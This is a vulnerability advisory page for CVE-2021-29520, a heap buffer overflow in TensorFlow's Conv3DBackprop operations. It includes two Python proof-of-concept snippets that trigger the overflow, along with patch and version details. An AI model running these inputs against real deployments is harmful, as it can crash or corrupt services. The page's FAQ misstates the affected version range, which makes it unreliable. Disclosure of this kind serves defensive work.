7.8
CWE
787 120 119
Advisory Published
Advisory Published
Updated

CVE-2021-29520: Heap buffer overflow in `Conv3DBackprop*`

First published: Fri May 14 2021(Updated: )

### Impact Missing validation between arguments to `tf.raw_ops.Conv3DBackprop*` operations can result in heap buffer overflows: ```python import tensorflow as tf input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32) out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 89, 29, 89, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) ``` ```python import tensorflow as tf input_values = [-10.0] * (7 * 7 * 7 * 7 * 7) input_values[0] = 429.6491056791816 input_sizes = tf.constant(input_values, shape=[7, 7, 7, 7, 7], dtype=tf.float32) filter_tensor = tf.constant([7, 7, 7, 1, 1], shape=[5], dtype=tf.int32) out_backprop = tf.constant([-10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[7, 1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv3DBackpropFilterV2(input=input_sizes, filter_sizes=filter_tensor, out_backprop=out_backprop, strides=[1, 37, 65, 93, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) ``` This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/4814fafb0ca6b5ab58a09411523b2193fed23fed/tensorflow/core/kernels/conv_grad_shape_utils.cc#L94-L153) assumes that the `input`, `filter_sizes` and `out_backprop` tensors have the same shape, as they are accessed in parallel. ### Patches We have patched the issue in GitHub commit [8f37b52e1320d8d72a9529b2468277791a261197](https://github.com/tensorflow/tensorflow/commit/8f37b52e1320d8d72a9529b2468277791a261197). The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. ### For more information Please consult [our securityguide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.

Credit: security-advisories@github.com security-advisories@github.com

Affected SoftwareAffected VersionHow to fix
pip/tensorflow-gpu>=2.4.0<2.4.2
2.4.2
pip/tensorflow-gpu>=2.3.0<2.3.3
2.3.3
pip/tensorflow-gpu>=2.2.0<2.2.3
2.2.3
pip/tensorflow-gpu<2.1.4
2.1.4
pip/tensorflow-cpu>=2.4.0<2.4.2
2.4.2
pip/tensorflow-cpu>=2.3.0<2.3.3
2.3.3
pip/tensorflow-cpu>=2.2.0<2.2.3
2.2.3
pip/tensorflow-cpu<2.1.4
2.1.4
pip/tensorflow>=2.4.0<2.4.2
2.4.2
pip/tensorflow>=2.3.0<2.3.3
2.3.3
pip/tensorflow>=2.2.0<2.2.3
2.2.3
pip/tensorflow<2.1.4
2.1.4
TensorFlow Keras<2.1.4
TensorFlow Keras>=2.2.0<2.2.3
TensorFlow Keras>=2.3.0<2.3.3
TensorFlow Keras>=2.4.0<2.4.2

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Frequently Asked Questions

  • What is the severity of CVE-2021-29520?

    CVE-2021-29520 has a high severity due to the potential for heap buffer overflows affecting application stability and security.

  • How do I fix CVE-2021-29520?

    To resolve CVE-2021-29520, update TensorFlow to version 2.4.2 or later.

  • Which versions of TensorFlow are vulnerable to CVE-2021-29520?

    The vulnerable versions of TensorFlow are below 2.4.2, specifically versions 2.4.0 to 2.1.4.

  • What components are affected by CVE-2021-29520?

    CVE-2021-29520 affects TensorFlow and its GPU and CPU variants.

  • What impact does CVE-2021-29520 have on applications?

    CVE-2021-29520 can lead to application crashes or unexpected behavior due to memory corruption.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2025 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203